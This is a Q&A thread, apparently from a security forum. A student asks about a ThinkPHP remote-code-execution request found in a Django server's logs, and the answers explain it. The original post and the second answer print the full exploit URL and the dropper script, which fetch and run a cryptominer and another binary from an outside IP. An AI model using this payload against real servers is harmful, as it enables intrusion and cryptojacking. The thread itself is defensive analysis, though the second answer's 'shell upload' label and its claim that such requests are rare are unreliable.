3

I developed a Django application for a school project and I hosted it on an EC2 instance to test and learn the environment.

During inspection of the logs, I found the following GET request,

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 200 9472

This seems strange because I don't use PHP, I guess that someone assumed I use PHP, then tried to download and run a script ex.sh from 205.185.113.123. The content of that script is,

cd /tmp; wget http://205.185.113.123/mcoin; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=90; rm -rf RjsWs
cd /tmp; wget http://205.185.113.123/sefa.x86; chmod 777 sefa.x86; ./sefa.x86 xd
rm -rf ex.sh

Since I don't know web apps and security much, I have some questions,

  • Is this an attack? If so, what is the name of this attack?
  • Can this attack be adapted for Django instead of PHP?
  • Is this normal for web apps? Do they always get these kind of requests?
  • According to https://ipinfo.info/, the IP address is registered for a company called FranTech Solutions. Are they related to this attack?
  • Is this illegal? If so, can I take legal action?
EdOverflow
  • 1,246
  • 8
  • 21
Emre Sülün
  • 133
  • 1
  • 5
  • 2
    Concerning the statement "`I guess that someone assumed I use PHP`", it is far more likely that this is an automated attack whereby an adversary is currently scanning entire ranges of hosts and IPs for this ThinkPHP remote code execution vulnerability. They wouldn't have even tried to guess whether or not your application is PHP-based — this is more of a "spray-and-pray" process. – EdOverflow Dec 25 '18 at 13:50

2 Answers2

4
  • This is trying to exploit a remote code execution vulnerability in ThinkPHP. So yes, someone is attempting to attack.
  • Yes, although this specific one is specific for ThinkPHP, there are also regularly vulnerabilities for Django
  • Yes, this is very common for web apps. This is not the only type of request to attack and a succesful attacker might change the log file so you don't notice there was an attack. In my opinion a publicy hosted web app which processes non-public information (this also includes usernames/passwords for login) should not be done for a school project, at least without professional consulting because of the risks like stolen data. Even with only publicy available information it can cause damage like costs for computing costs like when the attacker uses it as crypto miner (like in your case) and manages to spin up more instances.
  • FranTech Solutions seems to rent out servers. So it might be FranTech Solutions, it might be a customer of FranTech Solutions or it might be someone hacked a customer of FranTech Solutions.
  • Wether it is illegal or not depends on the juristication. But typically police will not be interested in attempts without significant damage. You might send a complaint to FranTech Solutions and if they get enough complaints they might or might not shut down the server or customer or they might or might not just inform the customer of the server that the server might got hacked and the customer might or might not fix the server.

Typically webmasters will ignore such log entries after making sure they aren't vulnerable because it is so common, especially if the website has more than 100 users.

H. Idden
  • 2,988
  • 1
  • 10
  • 19
  • 1
    Just to add further details to your second point, the vulnerability type (i.e., remote code execution) can affect Django-based application, but this specific exploit code is really designed for targets running ThinkPHP. I think this should be made explicitly clear to prevent potential confusion. – EdOverflow Dec 25 '18 at 13:43
  • @EdOverflow thanks for noticing it could be interpreted differently than I ment to – H. Idden Dec 25 '18 at 13:49
0

Yes,This exploit is basically shell upload .In which attacker upload the file and that file directly interact with your server to perform the system commands remotely.

I already download that file from your link that looks like this 

cd /tmp; wget http://205.185.113.123/mcoin; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=90; rm -rf RjsWs
cd /tmp; wget http://205.185.113.123/sefa.x86; chmod 777 sefa.x86; ./sefa.x86 xd
rm -rf ex.sh

Basically that file download 2 more file that is mcoin and sefa.x86 you need to look for those 2 files as well.Those two files are pre-compiled file so its very hard tell what actually that does to your server. But according to my study those files are crypto-currency miners.

https://www.webopedia.com/TERM/C/cryptomining-malware.html

Answers: 1) Is this an attack? If so, that is the name of this attack?

Yes,Shell Upload

2) Can this attack be adapted for Django instead of PHP?

If you really want know that attack is successfully executed than you need to search your web server directory and find those file name ex.sh mcoin sefa.x86

3) Is this normal for web apps? Do they always get that kind of requests? No,

4) Is this illegal? If so, can I start a legal action?

yes this is illegal,Yeah you can take the legal action

Zodiac070495
  • 71
  • 8
  • 3
    Why do consider it is not normal to get such requests? Even on small web apps with less than 10 users where I have access to the logs there are more than 100 such requests per hour (most of them on the IP instead of the hostname). – H. Idden Dec 25 '18 at 13:35
  • yeah but these kind of things is not usually seen in log file.Automated scanners and other types of attempts are usually i seen. @H.Idden – Zodiac070495 Dec 25 '18 at 14:54